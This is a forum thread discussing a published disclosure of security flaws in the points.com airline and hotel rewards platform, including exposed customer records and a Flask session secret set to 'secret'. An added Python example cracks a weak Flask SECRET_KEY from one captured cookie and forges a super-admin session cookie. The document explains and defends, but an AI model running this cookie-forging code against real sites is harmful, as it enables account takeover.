IT security problems at Miles & More, Hilton, Marriott, IHG, and the FFPs of DL, EK, SQ, UA, EY, AC, CX, …


qube

Experienced Member
Leaked Secrets and Unlimited Miles: Hacking the Largest Airline and Hotel Rewards Platform

It starts with
Our first report was an unauthenticated HTTP path traversal allowing access to an internal API which would’ve allowed an attacker to query entries from a set of 22 million order records. The data within the records included partial credit card numbers, home addresses, email addresses, phone numbers, reward points numbers, customer authorization tokens, and miscellaneous transaction details. This information could be queried through an API call that returned one-hundred results per HTTP request. By appending optional sorting parameters, an attacker could enumerate the data or query for specific information (e.g. searching a customer's name or email address).
and it gets considerably more colorful from there.
 

Arnuntar

Experienced Member
They seriously used the word "secret" as the password for signing tokens?

On May 2nd, 2023, we identified that the Flask session secret for the points.com global administration website used to manage all airline tenant and customer accounts was the word “secret”. After discovering this vulnerability, we were able to resign our session cookies with full super administrator permissions.

At least they apparently reacted quickly:
We had reported all issues to the points.com security team who very quickly patched them and worked with us in creating this disclosure.
 
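To show what "re-signing our session cookies" with a guessed secret actually means, here is an added example (not code from the thread, from the points.com report, or from Flask itself). It reimplements with the standard library only the cookie-signing scheme Flask's SecureCookieSessionInterface gets from itsdangerous' URLSafeTimedSerializer (salt "cookie-session", "hmac" key derivation, HMAC-SHA1 signatures, dot-separated url-safe base64 fields). It assumes the target used that stock scheme; the session contents, role names and wordlist are constructed for illustration and are not taken from the report.

```python
"""Forge and verify Flask-style session cookies under a weak SECRET_KEY.

Added example, not code from Flask or from the points.com disclosure. It
mirrors itsdangerous.URLSafeTimedSerializer as configured by Flask's
SecureCookieSessionInterface; assumption: the real site used this stock
scheme. All payloads below are constructed sample data.
"""
import base64
import binascii
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"   # Flask's fixed salt for session cookies
SEP = b"."


def _b64e(raw: bytes) -> bytes:
    # itsdangerous strips '=' padding from url-safe base64
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret: str) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def _encode_payload(session: dict) -> bytes:
    raw = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:
        # a leading '.' marks a zlib-compressed payload
        return b"." + _b64e(compressed)
    return _b64e(raw)


def _decode_payload(field: bytes) -> dict:
    compressed = field.startswith(b".")
    raw = _b64d(field[1:] if compressed else field)
    return json.loads(zlib.decompress(raw) if compressed else raw)


def sign_session(session: dict, secret: str, now: Optional[int] = None) -> str:
    """Build payload.timestamp.signature exactly as the server would."""
    ts = int(time.time()) if now is None else now
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    body = _encode_payload(session) + SEP + _b64e(ts_bytes)
    sig = hmac.new(_derive_key(secret), body, hashlib.sha1).digest()
    return (body + SEP + _b64e(sig)).decode()


def verify_session(cookie: str, secret: str, max_age: Optional[int] = None,
                   now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the signature (and age) check out, else None."""
    body, _, sig = cookie.encode().rpartition(SEP)
    if not body:
        return None
    try:
        expected = hmac.new(_derive_key(secret), body, hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64d(sig)):
            return None
        payload, _, ts_field = body.rpartition(SEP)
        ts = int.from_bytes(_b64d(ts_field), "big")
        if max_age is not None and (int(time.time()) if now is None else now) - ts > max_age:
            return None
        return _decode_payload(payload)
    except (binascii.Error, ValueError, zlib.error):
        return None


def recover_secret(cookie: str, candidates) -> Optional[str]:
    """Offline wordlist attack on one captured cookie: the cookie alone is the oracle."""
    for cand in candidates:
        if verify_session(cookie, cand) is not None:
            return cand
    return None


if __name__ == "__main__":
    WEAK = "secret"
    # constructed: a cookie a low-privilege tenant user might have been issued
    victim = sign_session({"user_id": 4711, "role": "tenant_user"}, WEAK)
    found = recover_secret(victim, ["password", "changeme", "admin", "secret"])
    print("recovered SECRET_KEY:", found)
    forged = sign_session({"user_id": 1, "role": "super_admin"}, found)
    print("server accepts forged cookie as:", verify_session(forged, WEAK))
    print("same cookie under a strong key:", verify_session(forged, "L7x9!qZ2-random-key"))
```

The takeaway for defenders: a session cookie is only as strong as SECRET_KEY, and because verification is fully offline, any captured cookie lets an attacker test candidate keys at wire speed. Generate the key from `os.urandom`, keep it out of source control, and rotate it if there is any chance it leaked.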